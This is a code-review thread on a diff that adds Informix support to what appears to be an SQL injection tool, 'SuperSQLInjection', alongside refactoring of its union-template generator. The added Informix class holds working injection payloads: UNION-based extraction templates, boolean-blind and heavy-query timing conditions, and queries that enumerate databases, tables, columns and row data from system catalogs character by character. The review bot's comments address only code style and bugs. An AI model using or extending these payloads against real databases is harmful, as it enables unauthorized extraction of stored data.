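Review bot: The new `unionColumnCountTestByInformix` hard-codes ` from sysmaster:sysdual`, the same literal that `Informix.union_value` carries elsewhere in this commit, and its body appears to repeat the DB2 variant just above it with only the FROM clause changed. Keeping the per-database suffix in one place and routing both methods through a small private helper that takes the suffix would stop the copies from drifting apart. The parameter name `unionTempaldate` looks like a misspelling of `unionTemplate`, and neither argument is checked for null before `Replace` is called, so a doc comment stating that both must be non-null would help callers. The start of the DB2 method is outside this hunk, so the duplication is inferred from its last three lines.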


@@ -0,0 +1,126 @@
using System;
using System.Collections.Generic;
using System.Text;
using tools;
namespace SuperSQLInjection.payload
{
class Informix
{
//加载对应配置(需要读取的环境变量)
public static String path = "config/vers/informix.txt";
public static List<String> vers = FileTool.readFileToList(path);
//数据库数量
public static String dbs_count = "(select count(*) from sysmaster:sysdatabases)";
//表数量
public static String tables_count = "(select count(*) from {dbname}:systables where tabtype='T' and tabid>99)";
//列数量
public static String columns_count = "(select count(*) from {dbname}:systables t,{dbname}:syscolumns c where t.tabid=c.tabid and t.tabname='{table}')";
//获取数据库名
public static String db_value = "(select name from (select skip {index} first 1 name from sysmaster:sysdatabases))";
//获取表名称
public static String table_value = "(select tabname from (select skip {index} first 1 tabname from {dbname}:systables where tabtype='T' and tabid>99))";
//获取列名称
public static String column_value = "(select colname from (select skip {index} first 1 colname from {dbname}:systables t,{dbname}:syscolumns c where t.tabid=c.tabid and t.tabname='{table}'))";
//获取数据库数量bool方式
public static String bool_db_count = " " + dbs_count + ">{len}";
//获取表数量bool
public static String bool_tables_count = " " + tables_count + ">{len}";
//获取列数量bool
public static String bool_columns_count = " " + columns_count + ">{len}";
public static String substr = "substr(({data})),{index},1)";
//多字节
public static String hex_value = "ascii({data})";
//bool方式字符长度判断
public static String bool_length = " length(({data}))>{len}";
//bool方式获取值
public static String bool_value = " ascii(substr({data},{index},1))>{len}";
//最大32767
public static String cast_value = "rtrim(cast({data} as char(32767)))";
public static String no_cast_value = "({data})";
//获取行数据
public static String data_value = "(select "+ cast_value + " from (select skip {index} first 1 {allcolumns} from {dbname}:{table}))";
//获取行数据
public static String data_no_cast_value = "(select {data} from (select skip {index} first 1 {allcolumns} from {dbname}:{table}))";
//union获取数据条数
public static String data_count = "(select count(*) from {dbname}:{table})";
public static String bool_datas_count = " " + data_count + ">={len}";
//union获取值
public static String union_value = " 1=2 union all select {data} from sysmaster:sysdual";
public static String rand = Tools.RandNum(3);
public static String start = rand + 0;
public static String mid = rand + 5;
public static String end = rand + 9;
public static String getBoolDataBySleep(String data)
{
return " 1=(case when(" + data + ") then (select 1 from(select count(*) from sysmaster:syspaghdr)) else 1 end)";
}
public static String getBoolCountBySleep(String data)
{
return " 1=(case when(" + data + ") then (select 1 from(select count(*) from sysmaster:syspaghdr)) else 1 end)";
}
public static String getUnionDataValue(String unionFileTemplate, String dataPayLoad, String dbname, String table, String index,String castStr)
{
String temlate=unionFileTemplate.Replace("{data}", "(to_char("+start+ ")||to_char(" + start + ")||" + castStr.Replace("{data}", dataPayLoad.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)) + "||to_char(" + end + ")||to_char(" + end + "))");
return union_value.Replace("{data}", temlate);
}
public static String unionColumns(List<String> columns, String unionStr)
{
StringBuilder sb = new StringBuilder();
decimal c = 32000 / columns.Count;
int max = (int)Math.Ceiling(c);
foreach (String column in columns)
{
sb.Append(cast_value.Replace("32767", max.ToString()).Replace("{data}", column) + unionStr);
}
sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
return sb.ToString();
}
public static String getUnionDataValue(String unionFileTemplate, List<String> columns, String dbname, String table, String index)
{
String data = "to_char(" + start + ")||to_char(" + start + ")||" + unionColumns(columns,"||to_char("+ mid + ")||") + "||to_char(" + end + ")||to_char(" + end + ")";
String template= unionFileTemplate.Replace("{data}", (data_no_cast_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)));
return union_value.Replace("{data}", template);
}
/// <summary>
/// 获得bool方式值payload
/// </summary>
/// <param name="dataStr">对应值的查询SQL</param>
/// <param name="dbName">数据库名</param>
/// <param name="table">表名</param>
/// <param name="index">下标</param>
/// <returns></returns>
public static String getBoolDataPayLoad(String column, String dbName, String table, int index)
{
String payload = data_value.Replace("{data}", column).Replace("{allcolumns}", column).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index.ToString());
return payload;
}
}
}
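Review bot: `unionColumns` divides by `columns.Count` with no guard, so an empty list throws DivideByZeroException instead of a clear argument error. Because `32000 / columns.Count` is integer division, the value is already truncated before it is stored in `decimal c`, which makes `Math.Ceiling` a no-op; `int max = 32000 / columns.Count;` states the same thing directly. A guard at the top such as `if (columns == null || columns.Count == 0) throw new ArgumentException("columns must not be empty", "columns");` would make the failure explicit. Separately, the XML doc on `getBoolDataPayLoad` documents a parameter `dataStr` that the signature calls `column`, and `getBoolDataBySleep` and `getBoolCountBySleep` have identical bodies, so one could delegate to the other.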


@@ -711,6 +711,10 @@ namespace tools
{ {
return strToChrOrChar(str, "chr", joinStr, encode); return strToChrOrChar(str, "chr", joinStr, encode);
} }
public static String informixStrToChr(String randstr)
{
return "to_char("+ randstr + ")";
}
/// <summary> /// <summary>
/// 转换chr供SQLServer替换库名防止单引号被拦截或过滤 /// 转换chr供SQLServer替换库名防止单引号被拦截或过滤
@@ -1195,15 +1199,27 @@ namespace tools
} }
//DB2的每列是数字或者字符的穷举 //DB2的每列是数字或者字符的穷举
private static String[] fillStr = { "1", "chr(32)"}; private static String[] DB2_fillStr = { "1", "chr(32)"};
/// <summary> private static String[] Infomix_fillStr = { "1", "''" };
/// 获得DB2的每列是数字或者字符的穷举
/// </summary>
/// <param name="n">总列数</param>
/// <returns></returns> // 获得DB2的每列是数字或者字符的穷举
public static List<String> getDB2UnionTemplates(int sumCount, int showIndex) public static List<String> getDB2UnionTemplates(int sumCount, int showIndex)
{
return getUnionTemplates(DB2_fillStr, sumCount, showIndex);
}
// 获得informix的每列是数字或者字符的穷举
public static List<String> getInformixUnionTemplates(int sumCount, int showIndex)
{
return getUnionTemplates(Infomix_fillStr, sumCount, showIndex);
}
// 获得数据库的每列是数字或者字符的穷举
private static List<String> getUnionTemplates(String[] fillStr,int sumCount, int showIndex)
{ {
List < String > list= new List<String>(); List < String > list= new List<String>();
if (sumCount == 1) if (sumCount == 1)
@@ -1214,10 +1230,10 @@ namespace tools
else { else {
int n = sumCount - 1; int n = sumCount - 1;
String[] codes = new String[2 << (n - 1)]; String[] codes = new String[2 << (n - 1)];
createGrayCode(codes, n); createGrayCode(fillStr,codes, n);
foreach(String code in codes) foreach(String code in codes)
{ {
String cp = insertDB2ShowTemplate(code,showIndex); String cp = insertShowTemplate(code, showIndex);
list.Add(cp); list.Add(cp);
//插入,显示列 //插入,显示列
} }
@@ -1225,14 +1241,14 @@ namespace tools
return list; return list;
} }
private static String insertDB2ShowTemplate(String temlate,int showIndex) { private static String insertShowTemplate(String temlate,int showIndex) {
List<String> list = new List<String>(temlate.Split(',')); List<String> list = new List<String>(temlate.Split(','));
list.Insert(showIndex,"{data}"); list.Insert(showIndex,"{data}");
return String.Join(",", list); return String.Join(",", list);
} }
private static void createGrayCode(String[] codes, int n) private static void createGrayCode(String[] fillStr, String[] codes, int n)
{ {
if (n == 1) if (n == 1)
{ {
@@ -1241,7 +1257,7 @@ namespace tools
} }
else else
{ {
createGrayCode(codes, n - 1); createGrayCode(fillStr,codes, n - 1);
int len = 2 << (n - 1); int len = 2 << (n - 1);
int half = len >> 1; int half = len >> 1;
for (int i = len - 1, j = 0; i >= 0; i--) for (int i = len - 1, j = 0; i >= 0; i--)
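Review bot: The new field `Infomix_fillStr` is misspelled next to `getInformixUnionTemplates`, and the XML `<summary>`/`<param>` block that documented `getDB2UnionTemplates` has been replaced by a plain `//` comment, so the public method no longer carries structured documentation. I would rename the field to `Informix_fillStr` and restore `/// <summary>` blocks on both public wrappers. The shared `getUnionTemplates` helper now accepts any array; a comment such as `// fillStr must hold exactly two entries: the numeric and the string filler` would record that, assuming `createGrayCode` (its body continues outside the visible hunks) only reads the first two elements. `sumCount` is still not validated before `2 << (n - 1)` sizes the array, so a value below 1 or a very large one fails at allocation rather than with a clear error.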